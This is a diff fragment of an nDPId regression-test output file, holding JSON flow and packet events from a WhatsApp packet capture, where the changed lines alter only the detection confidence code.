00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1655051794036,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655051794036,"pkt":"eJS0JASgYDjgxTWgCABFAAA0Ow5AAD8Gx0vAqAJkszzDIbIiFGatOxW0\/J8dd4AQAKwWfwAAAQEICgU1Eusr+T5\/"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1655051794037,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655051794037,"pkt":"eJS0JASgYDjgxTWgCABFAAA4Ow9AAD8Gx0bAqAJkszzDIbIiFGatOxW0\/J8dd4AYAKzRLAAAAQEICgU1Euwr+T5\/RUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655051794002,"flow_last_seen":1655051794037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655051794037,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45602,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":185,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655044288744,"flow_last_seen":1655044288931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655051794206,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37582,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655051794002,"flow_last_seen":1655051794037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655051794037,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45602,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":185,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655044288744,"flow_last_seen":1655044288931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655051794206,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37582,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":185,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":185,"packets-processed":184,"total-skipped-flows":0,"total-l4-payload-len":14860,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":23,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":23,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":150,"global_ts_msec":1655052148615} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":185,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655052148615,"flow_last_seen":1655052148615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655052148615,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43152,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1655052148615,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655052148615,"pkt":"eJS0JASgYDjgxTWgCABFAAA8kfpAAD8GcEfAqAJkszzDMaiQFGZmurw1AAAAAKAC\/\/+h\/wAAAgQFtAQCCAo3+VSkAAAAAAEDAwk="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1655052148658,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655052148658,"pkt":"eJS0JASgYDjgxTWgCABFAAA0kftAAD8GcE7AqAJkszzDMaiQFGZmurw2KlSpWIAQAIA0yQAAAQEICjf5VPJAoYbY"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1655052148713,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655052148713,"pkt":"eJS0JASgYDjgxTWgCABFAAA4kfxAAD8GcEnAqAJkszzDMaiQFGZmurw2KlSpWIAYAIDvQAAAAQEICjf5VSlAoYbYRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":188,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655052148615,"flow_last_seen":1655052148758,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655052148758,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43152,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":188,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655052148615,"flow_last_seen":1655052148758,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655052148758,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43152,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655052438619,"flow_last_seen":1655052438619,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655052438619,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46042,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1655052438619,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655052438619,"pkt":"eJS0JASgYDjgxTWgCABFAAA8kqtAAD8Gb6bAqAJkszzDIbPaFGZdYrgnAAAAAKAC\/\/9CuwAAAgQFtAQCCAoFPujPAAAAAAEDAwk="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1655052438652,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655052438652,"pkt":"eJS0JASgYDjgxTWgCABFAAA0kqxAAD8Gb63AqAJkszzDIbPaFGZdYrgoyEw0oYAQAKw1RwAAAQEICgU+6PHmsVfE"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1655052438653,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655052438653,"pkt":"eJS0JASgYDjgxTWgCABFAAA4kq1AAD8Gb6jAqAJkszzDIbPaFGZdYrgoyEw0oYAYAKzv9AAAAQEICgU+6PLmsVfERUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655052438619,"flow_last_seen":1655052438654,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655052438654,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46042,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":201,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655044965142,"flow_last_seen":1655044965409,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655052438807,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45754,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655052438619,"flow_last_seen":1655052438654,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655052438654,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46042,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":201,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655044965142,"flow_last_seen":1655044965409,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655052438807,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45754,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":201,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":201,"packets-processed":200,"total-skipped-flows":0,"total-l4-payload-len":16467,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":25,"total-detection-updates":0,"total-updates":0,"current-active-flows":8,"total-active-flows":25,"total-idle-flows":17,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":162,"global_ts_msec":1655052853504} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655052853504,"flow_last_seen":1655052853504,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655052853504,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1655052853504,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655052853504,"pkt":"eJS0JASgYDjgxTWgCABFAAA8WWJAAD8GqN\/AqAJkszzDMajGFGY2dfJkAAAAAKAC\/\/87qwAAAgQFtAQCCAo3+7TWAAAAAAEDAwk="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1655052853586,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655052853586,"pkt":"eJS0JASgYDjgxTWgCABFAAA0WWNAAD8GqObAqAJkszzDMajGFGY2dfJl9PmkqoAQAICs4QAAAQEICjf7tS9HlNt1"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1655052853610,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655052853610,"pkt":"eJS0JASgYDjgxTWgCABFAAA4WWRAAD8GqOHAqAJkszzDMajGFGY2dfJl9PmkqoAYAIBnfgAAAQEICjf7tUFHlNt1RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655052853504,"flow_last_seen":1655052853647,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655052853647,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43206,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655052853504,"flow_last_seen":1655052853647,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655052853647,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43206,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":209,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":209,"packets-processed":208,"total-skipped-flows":0,"total-l4-payload-len":16801,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":26,"total-detection-updates":0,"total-updates":0,"current-active-flows":9,"total-active-flows":26,"total-idle-flows":17,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":168,"global_ts_msec":1655053633670} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655053633670,"flow_last_seen":1655053633670,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655053633670,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43230,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1655053633670,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655053633670,"pkt":"eJS0JASgYDjgxTWgCABFAAA8mVhAAD8GaOnAqAJkszzDMajeFGZP5tJgAAAAAKAC\/\/\/ryAAAAgQFtAQCCAo3\/AszAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1655053633701,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655053633701,"pkt":"eJS0JASgYDjgxTWgCABFAAA0mVlAAD8GaPDAqAJkszzDMajeFGZP5tJhk8uMoIAQAIDJOAAAAQEICjf8C1OqRoX7"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1655053633708,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655053633708,"pkt":"eJS0JASgYDjgxTWgCABFAAA4mVpAAD8GaOvAqAJkszzDMajeFGZP5tJhk8uMoIAYAICD4QAAAQEICjf8C1mqRoX7RUQAAQ=="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655053633670,"flow_last_seen":1655053633738,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655053633738,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43230,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":217,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655045751925,"flow_last_seen":1655045752178,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655053633932,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45824,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655053633670,"flow_last_seen":1655053633738,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655053633738,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43230,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":217,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655045751925,"flow_last_seen":1655045752178,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655053633932,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45824,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":217,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":217,"packets-processed":216,"total-skipped-flows":0,"total-l4-payload-len":17135,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":27,"total-detection-updates":0,"total-updates":0,"current-active-flows":9,"total-active-flows":27,"total-idle-flows":18,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":175,"global_ts_msec":1655054457330} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655054457330,"flow_last_seen":1655054457330,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655054457330,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46468,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1655054457330,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655054457330,"pkt":"eJS0JASgYDjgxTWgCABFAAA8VnBAAD8Gq+HAqAJkszzDIbWEFGa\/BmevAAAAAKAC\/\/\/mlQAAAgQFtAQCCAoFUzIKAAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1655054457362,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655054457362,"pkt":"eJS0JASgYDjgxTWgCABFAAA0VnFAAD8Gq+jAqAJkszzDIbWEFGa\/Bmewdx424oAQAKySKwAAAQEICgVTMiqQiUPS"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1655054457363,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655054457363,"pkt":"eJS0JASgYDjgxTWgCABFAAA4VnJAAD8Gq+PAqAJkszzDIbWEFGa\/Bmewdx424oAYAKxM2QAAAQEICgVTMiuQiUPSRUQAAQ=="} 
-00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655054457330,"flow_last_seen":1655054457365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655054457365,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46468,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655054457330,"flow_last_seen":1655054457365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655054457365,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46468,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":225,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":225,"packets-processed":224,"total-skipped-flows":0,"total-l4-payload-len":18408,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":28,"total-detection-updates":0,"total-updates":0,"current-active-flows":10,"total-active-flows":28,"total-idle-flows":18,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":181,"global_ts_msec":1655056441533} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655056441533,"flow_last_seen":1655056441533,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655056441533,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47360,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 